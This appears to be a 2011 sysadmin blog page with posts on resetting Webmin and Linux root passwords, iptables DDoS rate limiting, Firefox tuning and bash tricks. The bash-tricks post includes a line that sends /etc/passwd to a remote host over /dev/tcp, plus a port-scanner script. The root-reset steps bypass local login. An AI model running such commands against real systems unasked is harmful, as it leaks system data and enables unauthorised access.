Reset Webmin admin/root Password

February 3rd, 2011 3 Comments »

If you just forgot our webmin admin password and failed to logging to your webmin account and after several tries your Webmin blocked your IP you need to follow following steps to reset your webmin admin/root/master password:-

  1. Login to your box as root.
  2. If you are running a RedHat distribution (i.e. Fedora, CentOS, Gentoo), enter the following 
    /usr/libexec/webmin/changepass.pl /etc/webmin username password

    If you are running a Debian distribution, enter the following command:

    /usr/share/webmin/changepass.pl /etc/webmin username password

  3. You are almost done.

  4. Now you can Login to Webmin with your new password you just reset.

How To Reset ROOT (or any user’s) Password in Linux distro

February 3rd, 2011 2 Comments »

The root user can change the password for any other user. However what if you forget your root password?

To reset your root password (or any other account’s password for that matter), there are essentially two different situations which require varying approaches

When you can use Boot Loaders (GRUB / LILO)

If you have GRUB installed and you have accesses to edit boot parameters of selected entries then the job is as easy as it can get. Follow along and you shall have root access in no time. Once you have root access you can pretty much do anything you want to do!

  • Highlight the GRUB entry for the Linux installation that you want to reset the password for.
  • Press ‘e’ to edit. Select the Kernel line. Add ‘single’ at the end of the kernel line, Press ENTER and then Press ‘b’ to boot. If your system still requires you to enter the root password, add init=/bin/bash at the end. Press ‘b’ to boot.
  • Please note in some distros 'single' can be, 'linux single' , 'run level 1' etc.

GRUB Boot Loader

  • Either you would be taken to the root prompt directly or shown the recovery menu from where you can choose the root prompt. Use passwd <username> to change the password for any account.
  • Type reboot to reboot the system and then log in in with your new password.
When you can’t use Boot Loaders

If you are unable to use GRUB for whatever reasons (like password protected entries) you can still reset the password using a Live CD (I will be using Ubuntu Live CD, you may use any other). Just follow the steps below to achieve this:

  • Boot from the Live CD (Download Link) (Aslo you can try USB drive to boot after downloading .ISO file, try this)
  • Choose
    Try Ubuntu without any changes to your computer” 
  • When the system is ready, fire up a terminal window (CTRL+ALT+F1) and get ready for some command line action
  • Type sudo fdisk -l.
    In the output we are concerned to know which partition Linux is installed on and what name the hard disk is using. (e.g) in my case it is /dev/sda1 is the required partition. If you are sure about the partition you can skip this step
  • Next we need to mount the Linux partition. Create a directory to act as mount point for the partition. Use ‘sudo mkdir /media/masterdrive
  • Mount the linux partition using the command ‘sudo mount /dev/sda1 /media/masterdrive
  • Change Root to the mount directory – ‘sudo chroot /media/masterdrive
    (if no /bin/bash error, then try other partition=> sudo fdisk -l)
  • Type sudo passwd and then enter the new password to change the root password.
  • OR type password <username> for anyother user
  • Type sudo reboot to restart the system.
  • You just recovered your root password.

Preventing Layer 7 DDoS Attacks on a Service

January 26th, 2011 No Comments »

 

You might heard about Application‐level DDoS (Distributed Denial of Service) attacks on websites such as Twitter, Facebook and Wikileaks. Usually those kind of attacks involves a large number for HTTP/HTTPS requests to specific part of the website that could potentially eat up all the resource of  the server resulting unresponsive behavior from the web server.

There are already some tools available to shut down any website and make it unreachable for legitimate users.

Looking at the technique used to perform this attack, the tool sends about 10 Long HTTP/HTTPS requests per second until it reaches bandwidth or connection limits of the hosts or networking equipment to make it offline.

Now the question is how we can stop this attack? What are the preventive measures against the Layer7 DDoS?

First of all, we start limiting the traffic using hashlimit on iptables. This module can be used to allow just a certain number of packets per minute:

 

iptables -A INPUT -p tcp --dport 80 -m hashlimit --hashlimit-upto 50/min --hashlimit-burst 20 --hashlimit-mode srcip --hashlimit-name http -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

where "–hashlimit-burst 20" is the burst limit, you can adjust as per your requirement.

Also using Apache you can add a module mod_reqtimeout. This directive can set various timeouts for receiving the request headers and the request body from the client.

Hope this helps…


Protected: Microsoft : Vulnerability Statistics

December 28th, 2010 Enter your password to view comments.

This content is password protected. To view it please enter your password below:


Firefox Memory Tuneup

December 28th, 2010 No Comments »

Popular Firefox is not a light browser as many thinks, with number of ADDONs loaded and multiple tab opened it can eat up all the available memory. More and more you open tab/website more your memory is consumed and progressively stir your processor.

But by this memory tune-up you can improve performance of Firefox. Please follow steps:-

Open firefox. To config firefox at address bar type about:config

1. Limit Capacities of Cache Memory

The more and more you opens the web/tabs, Your computer memory progressively used up. To limit it add new option: browser.cache.memory.capacity.

  • Right Click in the Firefox Windows, New > Integer. Type “browser.cache.memory.capacity” then Press Enter,
  • Put into number 2048. 2048 here mean using maximal memory cache only 2 Mb.

2. Limit Capacities of cache history

  • "browser.sessionhistory.max_total_viewers", alter value -1 to 3.

3. Limit Capacities of Cache Disk

  • "browser.cache.disk.capacity", alter the value 50000 become 2000

4. Disable unused extension/addons

  • Disable Add-Ons you which do not use.

5. Disable download history

  • Select Tools menu > Options > Privacy. Then uncheck at “Remember what I’ve downloaded”.

 


Advance Bash Scriptiong Tricks

December 21st, 2010 No Comments »

Here are some of my Linux bash shell findings, I hope it is good for everyone

Find some text in current folder, sub-folders and files:-

find . | xargs grep 'string_to_find'

Getting current time from some time server:-

cat < /dev/tcp/time.nist.gov/13

Convert Unix Timestamp (aka Epoch):-

date -d @1292946804
Tue Dec 21 20:53:24 2010

Downloading a URL:-

exec 5<>/dev/tcp/www.net.cn/80
echo -e "GET / HTTP/1.0\n" >&5
cat <&5

Sending Data over network:-

cat /etc/passwd > /dev/tcp/example.com/10000

TCP Port Checker:-

(echo >/dev/tcp/127.0.0.1/23) 2>/dev/null \
&& echo open || echo close

And

cat < /dev/tcp/localhost/25

Smallest Port Scanner:-

#!/bin/sh
# Usage:>$PortScanner.sh hostname_or_ip startport endport
for ((i=$2; $i <=$3; i++)); do
echo >/dev/tcp/$1/$i && echo $i/tcp Port Open;
done 2>/dev/null

Making File Backup when working on it

cp portscanner.sh{,.bak}

“!$” Reusing Last command arguments

mkdir /path/to/exampledir
cd !$

Taking Folder Backup with rsync (local)

rsync -Aax myfolder/ myfolder-dirbkp_`date +”%Y%m%d”`/

Deleting all files/Folder except some (in this example data and config folder will not delete)

ls | grep -v ‘(data)|(config)’ | xargs rm -r

Will add more tricks laters…..